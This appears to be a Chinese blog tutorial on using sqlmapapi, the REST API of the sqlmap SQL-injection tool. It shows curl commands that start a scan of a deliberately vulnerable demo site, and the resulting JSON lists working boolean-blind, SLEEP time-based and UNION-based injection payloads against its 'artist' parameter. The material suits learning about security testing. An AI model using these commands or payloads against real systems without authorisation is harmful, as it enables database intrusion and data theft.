【Sqlmap】sqlmapapi的使用

sqlmapapi作为自动化分布式的工具,提供了不少便利。

sqlmapapi的参数:
[root@CentOS sqlmap-master]# python sqlmapapi.py -h
Usage: sqlmapapi.py [options]

Options:
-h, –help show this help message and exit
-s, –server Act as a REST-JSON API server
-c, –client Act as a REST-JSON API client
-H HOST, –host=HOST Host of the REST-JSON API server
-p PORT, –port=PORT Port of the the REST-JSON API server

sqlmapapi的操作步骤:
[root@CentOS sqlmap-master]# python sqlmapapi.py -s
[15:16:14] [INFO] Running REST-JSON API server at ‘127.0.0.1:8775’.
[15:16:14] [INFO] Admin ID: cddf73b09c3e45fce0087b28d96d26ab
[15:16:14] [DEBUG] IPC database: /tmp/sqlmapipc-TwbxoE
[15:16:14] [DEBUG] REST-JSON API server connected to IPC database
[root@CentOS sqlmap-master]# curl http://127.0.0.1:8775/task/new
{
“taskid”: “6bccaf0fe2043330”,
“success”: true
}[root@CentOS sqlmap-master]# curl-H “Content-Type: application/json” -X POST -d ‘{“url”: “http://testphp.vulnweb.com/artists.php?artist=1”}’ http://127.0.0.1:8775/scan/6bccaf0fe2043330/start
{
“engineid”: 17618,
“success”: true
}
[root@CentOS sqlmap-master]# curl http://127.0.0.1:8775/scan/6bccaf0fe2043330/data
{
“data”: [
{
“status”: 1,
“type”: 0,
“value”: [
{
“dbms”: “MySQL”,
“suffix”: “”,
“clause”: [
1
],
“ptype”: 1,
“dbms_version”: [
“>= 5.0.12”
],
“prefix”: “”,
“place”: “GET”,
“os”: null,
“conf”: {
“string”: null,
“notString”: null,
“titles”: false,
“regexp”: null,
“textOnly”: false,
“optimize”: false
},
“parameter”: “artist”,
“data”: {
“1”: {
“comment”: “”,
“matchRatio”: 0.71399999999999997,
“title”: “AND boolean-based blind – WHERE or HAVING clause”,
“templatePayload”: null,
“vector”: “AND [INFERENCE]”,
“where”: 1,
“payload”: “artist=1 AND 2672=2672”
},
“5”: {
“comment”: “”,
“matchRatio”: 0.71399999999999997,
“title”: “MySQL >= 5.0.12 AND time-based blind (SELECT)”,
“templatePayload”: null,
“vector”: “AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])”,
“where”: 1,
“payload”: “artist=1 AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))hKsS)”
},
“6”: {
“comment”: “– “,
“matchRatio”: 0.71399999999999997,
“title”: “Generic UNION query (NULL) – 1 to 20 columns”,
“templatePayload”: null,
“vector”: [
0,
3,
“– “,
“”,
“”,
“NULL”,
2,
true,
false
],
“where”: 2,
“payload”: “artist=-6479 UNION ALL SELECT CONCAT(0x7171767a71,0x7a6d7378465941786759,0x717a6b7a71),NULL,NULL– ”
}
}
}
]
}
],
“success”: true,
“error”: []